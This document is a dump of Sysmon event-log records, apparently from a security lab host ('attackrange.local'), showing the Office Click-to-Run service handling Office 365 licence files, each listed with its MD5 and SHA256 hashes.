Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription5-pl.xrm-msMD5=9049E8360C94C2D4ADBCB52D446DCEB9,SHA256=0AA5A96E1D8FEE33F5ABE1E5F36E75363FBAA04F0FF69FEF8479A171795CB649,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription4-ul-oob.xrm-msMD5=B43CD3E70E8C19E7517BA02B69CBB63E,SHA256=BD66BE6E7695E05C6EB4E1A40795BF12C672D7426E07411EDBE88AD33B6E79A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription4-ppd.xrm-msMD5=3DEB1F7ED607915950159B9AE5F60E81,SHA256=44FB7CEC0FD5A175F6612C251FC75A64705C8A77CC134C7BF8AA60A33D594913,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription4-pl.xrm-msMD5=6CE2456292E3E52A76E5843DD1037606,SHA256=E625FD8BAFFCE8D14C09268A0623AE399FF4F085B5A63EF72E0A082FC6D38057,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription3-ul-oob.xrm-msMD5=D46FBB6B2C50F8B88DABCE1113F1B624,SHA256=D0DF78989912565B8BB407A36744FC50ADBD32A37DE7A5CE0BE9FE4C3F1AF5A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-msMD5=D7A18CEDEC952E71AACF744DB8AFA2BE,SHA256=586CE4571C48E54BC192916DCA508C05A648D8BFF57E32B0782CB6621779B6D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription3-pl.xrm-msMD5=AF103FAA1B8FB2AB2AAACD31F5A0B24E,SHA256=1953205A5D9D3AC675801DB7AD87AFEB407DD6B19840A567B1B539561BF7797B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription2-ul-oob.xrm-msMD5=D1DAFFA4358312028273DAD92988758D,SHA256=8BF65BE01C5D5EB27C4FAF9F51C060CBA1FCB4AF3230C03CC1FF48FD13C76861,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription2-ppd.xrm-msMD5=3A5FE20BF4AB72E67050A5870797F383,SHA256=22F84B03F7F9591DC8FC6EB64B8BB75F4A71296A36707927F75D4EE5F9607EEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription2-pl.xrm-msMD5=E49D9D50124186C7DA06CEA01393390B,SHA256=5EA13572F86BC23BDD3F01603ED2DCFBD0E95C7AA67ECEF7BE38BAE545DDFA3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription1-ul-oob.xrm-msMD5=7573A4F713008A9FB57993F269C8852A,SHA256=3FB310B2C7BA1CFB0B4B82A6541E91C9F180C69DC30E76E1A2D246DD6D6CA9B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription1-ppd.xrm-msMD5=C7B49A5949A29939565BE9985F67D7D5,SHA256=05FF006C924721F86C21A9325C15B1EB85B8D434A5A600E0C62082F5222E3CFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Subscription1-pl.xrm-msMD5=1A435F011F6D66B78700E57E7103EB8B,SHA256=344D3EAEBA25ECAD7191FAB3B4DB41487413579E01439094E548D7C58FC7B93F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Grace-ul-oob.xrm-msMD5=4589B108361D32370287D35042CA8511,SHA256=8687C06AC1433EB336C601A3AE528524FACCCE0E2F44C27FCACF2297E8910AF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusR_Grace-ppd.xrm-msMD5=A5CCC4D0B706F76BC9EBD51E8FF8D614,SHA256=D5357E8937E4BEC4374B482A1A9F30C34F654C5EF4193007934B6C1BCC77AB49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusEDUR_SubTrial-ul-oob.xrm-msMD5=844352682D3E7B589102EEF1C1E9389E,SHA256=E3964DCB78D39BEABE25FC57AAAB73458245D357BF2629838EAAF59E5FD28262,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusEDUR_SubTrial-ppd.xrm-msMD5=213798CF31C9FF5C40FFF2C5284C9C83,SHA256=9C6863071E3A54167DC7D24A5F84ED147257C0369D625D07618169C289097ADF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusEDUR_SubTrial-pl.xrm-msMD5=7DE962D9CDF7F68A5BDDFC37AA7E4BA0,SHA256=B236263F79F9C6BF07B094BD3EE5A1C4DDC0D5DD49434126318E54D96337120B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusEDUR_Subscription-ul-oob.xrm-msMD5=BC24A557ABD25A5CFE73F0F21D9A3667,SHA256=F7BE7592E33B26A3DEA226116F26C3C47B6A10D705F33F64EAD57B15A7E05153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusEDUR_Subscription-ppd.xrm-msMD5=C4F8907771FC4034221E594D42005A10,SHA256=0930DD797E5511B4B2369360C0F73A7229CF0E9F5CC3734F0B8321D81CE81E4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusEDUR_Subscription-pl.xrm-msMD5=F3C1E40F769499D920644652B8B7FDE3,SHA256=6216F40F09F51ECB295477B767358B3299FA2E2ED2EFCB357DAD4E13B79B04BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusE5R_SubTrial-ul-oob.xrm-msMD5=0B118E2F9B7EE2189619B9AA6F295347,SHA256=FA053EB721187CA0E85FE81ACCA13AE573B3DC2FB0767CCB5736FB2AF2E6897A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusE5R_SubTrial-ppd.xrm-msMD5=8C2FC363DE47AE31D672EA7DE45A1869,SHA256=5437618D1EE82BB565D4FB3770C3C88E6E3A6F093106E2359BBB47ADC7AB7449,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusE5R_SubTrial-pl.xrm-msMD5=25D6B50531513F0D5D28B5F7C467AF9C,SHA256=006D7E904A35EB32F8DF1A64715EE815BE738749338305D7E1AD78A15B57BE14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusE5R_Subscription-ul-oob.xrm-msMD5=08DCA5CC93DF2D70352CC7D8C26B5E5E,SHA256=551279E56D62FBB55311689DBC8762D00F111DE414863609663465C6585FBD77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusE5R_Subscription-ppd.xrm-msMD5=934D1B47FE7DE49902E98AA6F5916404,SHA256=9199CF7181379B5AA83235E12701D241C34EBDA644377862B9F8E80CD9E46789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusE5R_Subscription-pl.xrm-msMD5=DA6830150AF6FA7E466E8D9DC58B16AC,SHA256=D8D2EB5D72368B65A75E48829CF3E5CBEB2DE10107378F8D51A2C3FE0F5715A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusDemoR_BypassTrial365-ul-oob.xrm-msMD5=09E1819EC47E22DD3511F9123CADBEC8,SHA256=78BECB80A0F7E3BBC6D1F09BE4E361FFC71060798F8A78267A4C7A4F47E67517,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365ProPlusDemoR_BypassTrial365-ppd.xrm-msMD5=A823049AFE3096A41CF310316877B06E,SHA256=A74283EF49A157E9A52CC04D4400006AF303AD8305A3164065762274BB15F549,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial5-ul-oob.xrm-msMD5=C1100701EFFACBFDFDDC547149E3E036,SHA256=7A76CF1EB5CB3D327FB1CC409D39AF7C23A02F279D49E9CCE0B42B9776F34C7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-msMD5=929FB80B56E0DAB0F6A557F6499C587D,SHA256=51081783174E54869660CD2DF548E01FC7F7013FF13E7BD8410F51F128B38FAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial5-pl.xrm-msMD5=2B1585DB7B64EFFB34B6D6296B6ED70F,SHA256=A64219C84B6DD52ACAB3F1E7C2FBA6588D475FFF2BC0D744346B1E6E0C2141B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial4-ul-oob.xrm-msMD5=B9F91E6A04E1DBD1E17050AD066AEB30,SHA256=05BA44BA43DA90BB919153350CD7DEAA907A65C74D3B32A9FA226FBC011A5E8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial4-ppd.xrm-msMD5=AB552A4BDAA5F64211D14793CA1A565E,SHA256=9FE1B4D83DE6FE4B6F15D175B82305CC3CB70B9746BDD14FA6243D8029FF08D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial4-pl.xrm-msMD5=B7FAB8DA7FEB69C3A9ADF9494C502942,SHA256=984FF5D71570123E9DA9AFC9496E5D21B81966507D8284D1ABEF57068A507F44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial3-ul-oob.xrm-msMD5=CAA0F5E8EA4B3BA77B3FAC342A1D469C,SHA256=CAE7A662BE56AAB9BB243E79663774BB0E170FC2486DC89778DBD1A3F2C625E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial3-ppd.xrm-msMD5=2D410A97BCF7FC553791F7EF75C4F0DA,SHA256=E55A2A11944C4616D1F6939A4AE2B7142AB7BE3BE17741109B20246D5BB5F4AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial3-pl.xrm-msMD5=B2EB9E5DE2B22C7739E911924A6F7329,SHA256=17DBBBA30F521FD7189976B2ED5AAFB0F959936A50E44390ECA080A21DF9AC76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial2-ul-oob.xrm-msMD5=E17FEC1014F65A4989E899A745A206F3,SHA256=2D5EE52B0C0D1E73CDDD6D2489C05B06955FFA3F09FD32BF6CF7A27562815AE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial2-ppd.xrm-msMD5=5EED0A0A77724F922B380706C4796448,SHA256=8D39508A94BDFE6DD4B3C845EEF2E3AB29901A260E6A515528C15D5718A46CD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial2-pl.xrm-msMD5=6589C04B1D4E985F159C9F2BC287FDB9,SHA256=0E59B137F13D43BAA23D69E0C94BB368C0A674106B370255829DC4FAA915D6C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial1-ul-oob.xrm-msMD5=5F9C438CBC70A9EEA1E3B751F06BDC35,SHA256=ACBEA13D856DA118E3619DA61193F1DBE10A0D9DE23FE032AD6C245BA26326D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial1-ppd.xrm-msMD5=AC5D95ACABD2471BD84CA7E1E54BA52F,SHA256=6A1137F22BFF104D159AAEB74CD44FAAEEFB913237EBF27EFAE86ADD7CF9F0F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\O365HomePremR_SubTrial1-pl.xrm-msMD5=1C9178233AA2725BC41D7232C3F98E3A,SHA256=C5C06C667FD29063C0B4F93A7BCB4162DB49BD7EF30647088B3177BE6E1DBF84,IMPHASH=00000000000000000000000000000000falsetrue 